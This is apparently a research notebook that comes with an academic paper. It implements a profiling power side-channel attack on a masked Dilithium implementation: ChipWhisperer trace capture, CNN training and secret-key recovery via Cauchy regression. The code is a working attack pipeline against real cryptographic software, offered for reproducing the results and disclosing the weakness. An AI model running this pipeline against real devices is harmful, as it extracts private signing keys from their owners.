## Profiling Side-Channel Attack on a Masked Dilithium Implementation
                                              
This notebook contains the proof-of-concept attack on the masked Dilithium implementation of [1], described in [2].
The Boolean to arithmetic conversion of masked shares is targeted to gain information about the commitment- or error-vector coefficient y.
Using Cauchy regression, this information is used to recover the partial secret key s_1.

[1] https://github.com/fragerar/Masked_Dilithium  
[2] https://eprint.iacr.org/2023/896

## 0) Setup
- Choose the security_level to attack. Re-run the notebook from the top whenever security_level changes.
- Import helper functions and dependencies from attack_includes.py.
- (Option A) Compile target firmware for CW308 with STM32F415RGT target and SimpleSerial V1.1 to capture traces.
  Optimization level 3 (-O3) is used as it is commonly the most resilient against SCA in lattice-based schemes [SKL+20].
- (Option B) Download the profiling and attack traces as well as the classifiers used for the attack described in the ASIACRYPT paper.

In [None]:
# Choose security level to attack from {2, 3, 5}
security_level = 2
y_intermediate = {2: 2**17, 3: 2**19, 5:2**19}[security_level]
data_path = "attack/paper_data/"

In [None]:
# Import includes and helpers
%run "attack/helper.py"
%matplotlib inline

##### (Option A) Install ChipWhisperer dependencies and build target firmware

In [None]:
pip install chipwhisperer==6.0.0

In [None]:
# Import capture helpers
%run "attack/capture.py"

In [None]:
%%bash
mkdir attack/extern
cd attack/extern
git clone --depth 1 --branch v6.0.0 https://github.com/newaetech/chipwhisperer.git
cd chipwhisperer
git submodule update --init firmware/mcu/hal/chipwhisperer-fw-extra

In [None]:
%%bash
cd attack/firmware
make OPT=3 PLATFORM='CW308_STM32F4' CRYPTO_TARGET='NONE' SS_VER='SS_VER_1_1' > /dev/null

##### (Option B) Download paper attack data for reproduction of results (1GB download, 7GB disk space)

In [None]:
%%bash
mkdir attack/paper_data
cd attack/paper_data
wget --progress=bar:force:noscroll https://zenodo.org/records/17291471/files/attack_data.zip
unzip -q attack_data.zip

## 1) Profiling Stage

In the profiling stage, power traces are collected on a profiling device A during the Boolean to arithmetic (b2a) conversion of randomly generated Boolean share pairs, masking either y<0 coefficients (labeled 0) or y>=0 coefficients (labeled 1). A CNN-based binary classifier is then trained to predict whether a trace corresponds to the conversion of shares masking a y<0 or a y>=0 coefficient.
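
The labeling described above can be sketched as follows. This is a minimal illustration, not the notebook's `capture_profiling_traces` helper: `make_profiling_inputs` and its parameters are hypothetical, the share width of 32 bits is an assumption, and the intermediate is assumed to be `y_intermediate + y` (so that `y_intermediate` corresponds to y = 0).

```python
import numpy as np

def make_profiling_inputs(y_intermediate, y_range, n_per_value, share_bits=32, seed=0):
    """Return (shares, labels, y) for a hypothetical profiling campaign."""
    rng = np.random.default_rng(seed)
    # Every y in [-y_range, y_range) is repeated n_per_value times.
    y = np.repeat(np.arange(-y_range, y_range, dtype=np.int64), n_per_value)
    # Assumption: the masked intermediate is y_intermediate + y.
    x = (y_intermediate + y).astype(np.uint64)
    # First-order Boolean masking: x = share_0 XOR share_1 with a fresh random mask.
    mask = rng.integers(0, 2**share_bits, size=x.shape, dtype=np.uint64)
    shares = np.stack([x ^ mask, mask], axis=1)
    # Label 0 for y < 0, label 1 for y >= 0.
    labels = (y >= 0).astype(np.uint8)
    return shares, labels, y

# Level 2 settings from this notebook: 2 * 16 * 2000 = 64000 share pairs.
shares, labels, y = make_profiling_inputs(2**17, y_range=16, n_per_value=2000)
```

Both classes are balanced by construction, since the interval contains as many negative as non-negative y values.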

### 1.1) (Option A) Load pre-captured profiling traces

In [None]:
# Load pre-captured profiling traces, captured on profiling device A.
# The same traces are used for levels 3 and 5 because both share
# y_intermediate = 2**19 (corresponding to y = 0).
profiling_idx = {2: 2, 3: 35, 5: 35}[security_level]
profiling_traces = np.load(data_path + f"/profiling/profiling_traces_{profiling_idx}_A.npy")
profiling_labels = np.load(data_path + f"/profiling/profiling_labels_{profiling_idx}_A.npy")

### 1.1) (Option B) Collect profiling traces

To collect profiling traces using a ChipWhisperer, make sure the Python dependency is installed (uncommented in requirements_attack.txt) and a recent ChipWhisperer framework is cloned into the attack folder (attack/extern/chipwhisperer).

##### Compile target firmware and program target

In [None]:
# Note that in the attack performed as part of the ASIACRYPT paper,
# two distinct ChipWhisperer Lite (CW308) devices with two distinct
# STM32F415RGT target/victim devices were used for
# profiling and attack respectively.
profiling_scope = cw.scope()
profiling_scope.default_setup()
# Flash the hex file to the target device
cw.program_target(profiling_scope, cw.programmers.STM32FProgrammer, "attack/firmware/b2a-CW308_STM32F4.hex", baud=115200)
profiling_target = cw.target(profiling_scope, cw.targets.SimpleSerial, flush_on_err=False)
# After successful programming the target replies with an 'OK!' message.
profiling_target.read()

##### Capture profiling traces

In [None]:
# Collect training data from executions of the b2a conversion in the interval y = 0 + [-y_range, +y_range[,
# with n_y_coeff traces per y-value, where y_intermediate = 2**17 for level 2 and 2**19 for levels 3 and 5.
# A representative subset of y coefficients is used for profiling, with 64,000 traces in total.
y_range = {2: 16, 3: 32, 5: 32}[security_level]
y_n = {2: 2000, 3: 1000, 5: 1000}[security_level]
profiling_traces, profiling_labels = capture_profiling_traces(profiling_scope, y_intermediate, y_range, n_y_coeff=y_n)

In [None]:
# Plot t-test, SNR and power traces for the collected traces, grouped into y<0 and y>=0
power_traces_0, power_traces_1, snr, t_univariate = analyse_traces(profiling_traces, profiling_labels)
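
For orientation, the two statistics named above can be computed per sample point as sketched below. This is not the notebook's `analyse_traces` helper (which is not shown here); `welch_t_and_snr` is a hypothetical stand-in that uses Welch's t-test and the usual variance-of-means over mean-of-variances SNR, applied to synthetic data with a leak planted at sample 5.

```python
import numpy as np

def welch_t_and_snr(traces, labels):
    """Per-sample Welch t-statistic and SNR for two labeled trace groups."""
    g0 = traces[labels == 0]
    g1 = traces[labels == 1]
    m0, m1 = g0.mean(axis=0), g1.mean(axis=0)
    v0, v1 = g0.var(axis=0, ddof=1), g1.var(axis=0, ddof=1)
    # Welch's t-test: difference of means over the pooled standard error.
    t = (m0 - m1) / np.sqrt(v0 / len(g0) + v1 / len(g1))
    # SNR: variance of the class means divided by the mean class variance.
    snr = np.var(np.stack([m0, m1]), axis=0) / np.mean(np.stack([v0, v1]), axis=0)
    return t, snr

# Synthetic demo: 2000 noise traces of 20 samples, class 1 leaks at sample 5.
rng = np.random.default_rng(1)
demo_labels = np.repeat([0, 1], 1000)
demo_traces = rng.normal(size=(2000, 20))
demo_traces[demo_labels == 1, 5] += 1.0
t_stat, snr_demo = welch_t_and_snr(demo_traces, demo_labels)
```

A common rule of thumb treats |t| > 4.5 as evidence of leakage at that sample point.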

### 1.2) Train CNN to classify between y<0 and y>=0

#### 1.2.1) (Option A) Load pre-trained model and scaler

In [None]:
model = tf.keras.models.load_model(f"{data_path}/profiling/classifier/attack_model_{security_level}.keras")
with open(f"{data_path}/profiling/classifier/attack_scaler_{security_level}.pickle", 'rb') as f:
    scaler = pickle.load(f)

#### 1.2.2) (Option B) Prepare data and train model

In [None]:
# Seed for reproducibility
SEED = 42
tf.keras.backend.clear_session()
random.seed(SEED)
tf.random.set_seed(SEED)
tf.config.experimental.enable_op_determinism()

# Split profiling traces into training data (70%) and
# validation data (30%).
trace_train, trace_validation, label_train, label_validation = train_test_split(
    profiling_traces, profiling_labels, test_size=0.3, stratify=profiling_labels, random_state=SEED)

scaler = StandardScaler()
trace_train = scaler.fit_transform(trace_train)
trace_validation = scaler.transform(trace_validation)

# Since we suspect dependencies between instructions 
# (4 sample points/instruction cycle) we choose a CNN
# with kernel size 8.
model = Sequential([
    Conv1D(64, kernel_size=8, activation='relu', input_shape=(trace_train.shape[1], 1)),
    MaxPooling1D(pool_size=2),
    Flatten(),
    Dense(1, activation='sigmoid')
])

# Best-performing epochs and weights, found empirically
# for high validation TPR and low FPR. Depending on this balance,
# more or fewer samples/signatures are required.
# Higher precision will decrease TPR on attack data and
# require more signatures for successful key recovery.
epochs = {2: 3, 3: 8, 5: 4}[security_level]
# For levels 3 and 5 a wider z-filter range is used
# (2: +-50 (max = eta*tau = 78), 3: +-100 (max = eta*tau = 196),
# 5: +-80 (max = eta*tau = 120)). Distinguishing between less distant
# Hamming weights then seems to be harder; higher positive weights
# empirically led to lower FPR and higher TPR.
weights = {2: {0: 1, 1: 1}, 3: {0: 1, 1: 40}, 5: {0: 1, 1: 40}}[security_level]
# Compile and train model!
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=[Precision(), Recall()])
model.fit(trace_train, label_train, epochs=epochs, batch_size=128, validation_data=(trace_validation, label_validation), class_weight=weights, shuffle=False)
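
The effect of the `class_weight` dictionary can be illustrated with a small, framework-free sketch. It assumes the usual behavior that each sample's binary cross-entropy is multiplied by the weight of its true class before averaging; `weighted_bce` is a hypothetical helper, and details of Keras's internal reduction are ignored.

```python
import math

def weighted_bce(probabilities, labels, class_weight):
    """Mean binary cross-entropy with a per-class weight on each sample."""
    total = 0.0
    for p, label in zip(probabilities, labels):
        # Cross-entropy of one sample given the predicted probability of class 1.
        loss = -math.log(p) if label == 1 else -math.log(1.0 - p)
        total += class_weight[label] * loss
    return total / len(labels)

# One positive and one negative sample, both predicted with probability 0.6.
probs = [0.6, 0.6]
labels_demo = [1, 0]
balanced = weighted_bce(probs, labels_demo, {0: 1, 1: 1})
skewed = weighted_bce(probs, labels_demo, {0: 1, 1: 40})
```

With the weights `{0: 1, 1: 40}`, an uncertain prediction on a positive sample contributes 40 times more to the loss than the same error on a negative sample.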

In [None]:
# Evaluate the classifier on the validation data with an 80% prediction threshold.
_ = predict(model, trace_validation, label_validation, threshold=0.8)
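
The `predict` helper is defined outside this notebook. As a rough sketch of what a thresholded evaluation could look like, the hypothetical `threshold_metrics` below assumes that a trace is labeled 1 only if the classifier's output probability reaches the threshold, and reports TPR, FPR and precision.

```python
def threshold_metrics(probabilities, labels, threshold=0.8):
    """Binarize probabilities at `threshold` and compute TPR, FPR and precision."""
    predicted = [1 if p >= threshold else 0 for p in probabilities]
    pairs = list(zip(predicted, labels))
    tp = sum(1 for p, l in pairs if p == 1 and l == 1)
    fp = sum(1 for p, l in pairs if p == 1 and l == 0)
    fn = sum(1 for p, l in pairs if p == 0 and l == 1)
    tn = sum(1 for p, l in pairs if p == 0 and l == 0)
    metrics = {
        "tpr": tp / (tp + fn) if tp + fn else 0.0,
        "fpr": fp / (fp + tn) if fp + tn else 0.0,
        "precision": tp / (tp + fp) if tp + fp else 0.0,
    }
    return predicted, metrics

demo_probs = [0.9, 0.85, 0.3, 0.95, 0.5, 0.1]
demo_truth = [1, 1, 1, 0, 0, 0]
demo_pred, demo_metrics = threshold_metrics(demo_probs, demo_truth)
```

Raising the threshold trades recall for precision: fewer traces are accepted as positive, but those that are accepted are more likely to be correct.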

## 2) Attack Stage

In the attack stage, the resource-intensive generation of signature data is first performed on a server. Next, traces are captured for the b2a conversion of the intermediate Boolean shares collected during signature generation. The classifier from the profiling stage predicts whether each trace shows the conversion of Boolean shares masking a y_i,j coefficient smaller than zero or greater than or equal to zero. This information is used to recover the partial Dilithium secret key s_1 using Cauchy regression.

### 2.1) (Option A) Load pre-captured attack traces

In [None]:
# Load pre-captured attack traces, captured on victim device B
# during b2a conversion of generated boolean_share pairs from 
# attack/attack_data_{security_level}/bs.npy
attack_traces = np.load(data_path + f"/attack/attack_traces_{security_level}_B.npy")
attack_labels = np.load(data_path + f"/attack/attack_labels_{security_level}_B.npy")

### 2.1) (Option B) Generate signature data and capture corresponding attack traces

ILWE samples (z = y + cs_1, with s_1 and y unknown) are collected within a hardcoded, empirically found z-filter range, namely from signature polynomials with public coefficients |z_i,j| < {2: 50, 3: 100, 5: 80}. The range is defined in data_generator/include/attack/data_generator.hpp as FILTER_Z.
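
As a worked example of what the filter implies: since y = z - cs_1, the magnitude of y is bounded by |z| + |cs_1|, and each coefficient of cs_1 is bounded by eta*tau (c has tau coefficients in {-1, +1}, and the coefficients of s_1 lie in [-eta, eta]). The sketch below combines the standard Dilithium parameters with the filter values above; the names `PARAMS` and `max_abs_y` are only illustrative.

```python
# Standard Dilithium parameters per security level.
PARAMS = {2: {"eta": 2, "tau": 39}, 3: {"eta": 4, "tau": 49}, 5: {"eta": 2, "tau": 60}}
# z-filter bounds used in this notebook (|z| < FILTER_Z).
FILTER_Z = {2: 50, 3: 100, 5: 80}

def max_abs_y(level):
    """Largest |y| a sample can have after filtering on |z| < FILTER_Z[level]."""
    cs1_max = PARAMS[level]["eta"] * PARAMS[level]["tau"]
    z_max = FILTER_Z[level] - 1  # the filter is a strict inequality
    return z_max + cs1_max

bounds = {level: max_abs_y(level) for level in (2, 3, 5)}
print(bounds)  # {2: 127, 3: 295, 5: 199}
```

All filtered samples therefore have a y coefficient close to zero compared with the full range of y.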

For masked Dilithium, with the security level set through the environment variable DILITHIUM_MODE, the data generator collects and outputs the following files:
- bs.npy -- The boolean shares generated to mask the sample's y_i,j coefficient (per sample) -- Shape: (n_samples, n_shares=2)
- c.npy -- The public challenge polynomial (per sample, may be identical for multiple samples) -- Shape: (n_samples, N=256)
- coeff.npy -- The coefficient index i of the sample -- Shape: (n_samples)
- poly.npy -- The polynomial index j of the sample -- Shape: (n_samples)
- s1.npy -- The partial Dilithium secret key we want to recover (once) -- Shape: (L={2: 4, 3: 5, 5: 7}, N=256)
- y.npy -- The actual y_i,j coefficient values used for evaluation (per sample) -- Shape: (n_samples)
- z.npy -- The public polynomial z_i,j coefficient (per sample) -- Shape: (n_samples)
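
To show how one row of c.npy together with a coefficient index i yields a linear equation in the coefficients of s_1, the sketch below builds the corresponding row of the negacyclic multiplication matrix in Z[X]/(X^N + 1). The helper names are hypothetical and a toy ring size of N = 8 is used; how recover_key.py actually assembles its system is not shown in this notebook.

```python
import numpy as np

def negacyclic_row(c, i):
    """Row a_i with (c * s)_i = <a_i, s> for multiplication modulo X^N + 1."""
    n = len(c)
    k = np.arange(n)
    row = c[(i - k) % n].astype(np.int64)
    # Terms that wrap around X^N pick up a minus sign because X^N = -1.
    row[k > i] *= -1
    return row

def negacyclic_mul(a, b):
    """Reference product of two polynomials modulo X^N + 1."""
    n = len(a)
    full = np.convolve(a, b)       # ordinary product, length 2N - 1
    result = full[:n].copy()
    result[: n - 1] -= full[n:]    # fold the upper half back with a sign flip
    return result

rng = np.random.default_rng(0)
c_demo = rng.integers(-1, 2, size=8)   # toy challenge with coefficients in {-1, 0, 1}
s_demo = rng.integers(-2, 3, size=8)   # toy secret with coefficients in [-2, 2]
rows = np.stack([negacyclic_row(c_demo, i) for i in range(8)])
```

Each sample then reads z_i,j = y_i,j + <a_i, s_1,j>, with a_i built from the sample's challenge c and coefficient index i, and j selecting the polynomial of s_1.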

##### Install dependencies for data generator

In [None]:
%%bash
cd attack/data_generator
mkdir extern
cd extern
git clone --depth 1 --branch v1.0.1 https://github.com/llohse/libnpy.git
git clone https://github.com/fragerar/Masked_Dilithium.git

##### Build and run data_generator for Dilithium (security_level)

In [None]:
%%bash -s "$security_level"
cd attack/data_generator
export DILITHIUM_MODE=$1 && ./build.sh

In [None]:
# Generate signature attack data (for 2500 zero coefficients this
# takes about 46 mins on 8 threads).
# The target number of zero coefficients was estimated from UMTS24.
# Successful attacks were performed for <y_zero_target> coefficients:
y_zero_target = {2: 2330, 3: 3200, 5: 4400}[security_level]
# This leads to the collection of approximately the following number of ILWE samples:
# 2: 227305
# 3: 620170
# 5: 711100
# Path for newly generated data
data_path = "./"
folder_path = f"attack/attack_data_{security_level}"

In [None]:
%%bash -s "{y_zero_target}" "{folder_path}"
# Usage: data_generator <bool Masked> <unsigned ZeroCoefficientsTarget> 
#  <string OutPath> (optional: <unsigned NThreads>)
./attack/data_generator/build/src/data_generator 1 $1 $2 4

#### Capture attack power traces of b2a conversion of generated boolean share pairs

In [None]:
# Note that in the attack performed as part of the ASIACRYPT paper,
# two distinct ChipWhisperer Lite (CW308) devices with two distinct
# STM32F415RGT target/victim devices were used for
# profiling and attack respectively.
attack_scope = cw.scope()
attack_scope.default_setup()
# Flash the hex file to the target device
cw.program_target(attack_scope, cw.programmers.STM32FProgrammer, "attack/firmware/b2a-CW308_STM32F4.hex", baud=115200)
attack_target = cw.target(attack_scope, cw.targets.SimpleSerial, flush_on_err=False)
# After successful programming the target replies with an 'OK!' message.
attack_target.read()

In [None]:
# Load .npy file of real-world generated Boolean shares
boolean_shares = np.load(f"{data_path}/attack/attack_data_{security_level}/bs.npy")
# Capture traces of the b2a conversion of the generated Boolean share pairs
attack_traces, attack_labels = capture_attack_traces(attack_scope, boolean_shares, y_intermediate)

### 2.2) Predict y-coefficients using the classifier and recover secret key s_1

In [None]:
# Apply the same scaling as in the profiling stage.
scaled_attack_traces = scaler.transform(attack_traces)
# Predict whether each trace shows the conversion of intermediates corresponding
# to y < 0 or y >= 0 coefficients, with at least 80% predicted probability.
prediction = predict(model, scaled_attack_traces, attack_labels, threshold=0.8)

In [None]:
# Paths to pass to command line call...
attack_data_path = f"{data_path}/attack/attack_data_{security_level}/"
prediction_path = f"{attack_data_path}/prediction.npy"
# Save prediction
np.save(prediction_path, prediction)
# Compute secret key using Cauchy regression.
# Usage: python recover_key.py <generated signature data> <prediction.npy>
%run attack/recover_key.py $attack_data_path $prediction_path
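
The script recover_key.py is not reproduced in this notebook. Purely as a generic illustration of robust regression with a Cauchy loss, the sketch below fits a toy linear model z = A s + noise in the presence of gross outliers, using iteratively reweighted least squares. The function `cauchy_irls`, the toy dimensions and the noise model are all assumptions and do not reflect the actual attack data or the script's implementation.

```python
import numpy as np

def cauchy_irls(A, z, scale=1.0, iterations=30):
    """Minimize sum(log(1 + (r / scale)**2)) with r = z - A @ s via IRLS."""
    s = np.linalg.lstsq(A, z, rcond=None)[0]      # ordinary least squares start
    for _ in range(iterations):
        r = z - A @ s
        w = 1.0 / (1.0 + (r / scale) ** 2)        # Cauchy weights downweight large residuals
        sw = np.sqrt(w)
        s = np.linalg.lstsq(A * sw[:, None], z * sw, rcond=None)[0]
    return s

# Toy instance: 8 small integer unknowns, 1000 equations, 5% gross outliers.
rng = np.random.default_rng(0)
secret = rng.integers(-2, 3, size=8)
A = rng.integers(-1, 2, size=(1000, 8)).astype(float)
noise = rng.normal(scale=0.5, size=1000)
outliers = rng.random(1000) < 0.05
noise[outliers] += rng.uniform(-50, 50, size=1000)[outliers]
z = A @ secret + noise
recovered = np.rint(cauchy_irls(A, z)).astype(int)
```

Because the Cauchy loss grows only logarithmically, samples that deviate strongly from the linear model have little influence on the fit, and rounding the estimate to integers gives the candidate for the small-coefficient secret.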